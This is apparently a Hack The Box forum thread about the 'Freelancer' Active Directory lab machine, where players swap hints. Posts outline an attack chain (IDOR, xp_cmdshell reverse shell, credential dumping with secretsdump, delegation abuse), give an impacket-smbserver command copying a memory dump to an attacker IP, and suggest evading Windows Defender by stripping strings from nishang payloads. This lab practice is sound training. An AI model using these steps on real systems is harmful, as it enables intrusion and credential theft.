Official Freelancer Discussion

Why the heck I got banned for ?

I had never learn so much in a machine, and precisely the AD knowledge I was looking after when I turned to HTB to do some Windows machines. Very annoying box but powerful lessons learnt. Also, what a great community. Please reach out if you need a pointer, there are so many gotchas in this box it can become crazy slow to progress through it

1 Like

can we still play this machine? says expired

Yes you just wont get seasonal points for it. You can still get flag points though.

i want to give a great thanks to all helping people here … specially @bsnun for your clues thanks again …
i spent so many time before realized that my RunasCs was wrong :person_facepalming:

here is some help for others:
elevate_to_employer > look at Qrcode(IDOR attack)> go to admin page> got sql_svc shell> find mi**** cerd (use RunasCs.exe) > got user.txt > upload the memory dump and got SAM, S***** > Got l*** password (using secretdump) > whoami /all > search how to abuse this Ad group > create computer > add it in Dc contoler > impersonate Administrator > Got root…

2 Likes

I’m struggling with what to do with the MEMORY.DMP file on Kali, any tips on how to analyse it?

try to use a tool to mount it in /mnt : memprocfs… so that you will be able to explore its contains

RunasCs.exe is not giving me reverse shell my netcat listener is getting killed after the catching connection.

good luck guy I spent so many time to solve it:

Try to redownload your RunasCs, choose antonioCoco git one it should give a stable shell…
Also you don’t really need to use nc the -r option of runas can got it… But it ought to you :innocent:
I hope it would help

tbh I am just looking forward for any official writeup on this machine I could see that I really suc* on AD and all this thing about permissions and all those options… I will try to learn more about it. This machine was indeed too much for me right now and my frustration ends up on blaming others… the truth is that the machine was completely pwnable from the start as it has been proved by hundreds of players… I will get there… just not today

3 Likes

Anyone willing to ELI5 for some Impacket syntax (and maybe confirm I’m going about root correctly)?

Can someone tell me how to download the MOMRY.7z file? Tried a lot of methods without success, thank you very much!

run a smb server with credentials and then on powershell you

impacker-smbserver sharename -smb2support -user winusername -password validpassword 
copy-item memory.7z \\10.10.10.10\sharename\name.7z

make sure to change the ip to you ip address…

ps: check the parameters for smbserver… I just wrote this reply without checking the correct parameters… but it is something like that

impacker-smbserver sharename . -smb2support -username winusername -password validpassword

If anyone has trouble getting the reverse shell from xp_cmdshell I got it with a netcat binary with different hash from the one on git. The AV is really annoying

The port 80 should be open, right?

Done serveral different scan techniquies but port 80 stays closed even after reseting the machine and waiting some time.

I am using the EU Free3 VPN back then(Seasonal Machine) it said use Release Arena but the machine is unreachable when I am connected to. Same for the Pwnbox as long it is in the Release Arena network in EU Free3 it is:

 sudo nmap -vv -p 80 10.10.11.5
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-17 14:45 BST
Initiating Ping Scan at 14:45
Scanning 10.10.11.5 [4 ports]
Completed Ping Scan at 14:45, 2.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.01s elapsed
Initiating SYN Stealth Scan at 14:45
Scanning 10.10.11.5 [1 port]
Completed SYN Stealth Scan at 14:45, 0.11s elapsed (1 total ports)
Nmap scan report for 10.10.11.5
Host is up, received timestamp-reply ttl 127 (0.092s latency).
Scanned at 2024-06-17 14:45:53 BST for 0s

PORT   STATE  SERVICE REASON
80/tcp closed http    reset ttl 127

I maybe wrong but release arena is only for the first week a box is released.

You might be right and when I check the machine it is stated at EU Free but for me it doesn’t look like they have fixed the issue with the port 80 during this time.

Anyone know how to bypass windows defender? every tool is deleted when i try to run it

I did it by removing suspicious strings from payloads like nishang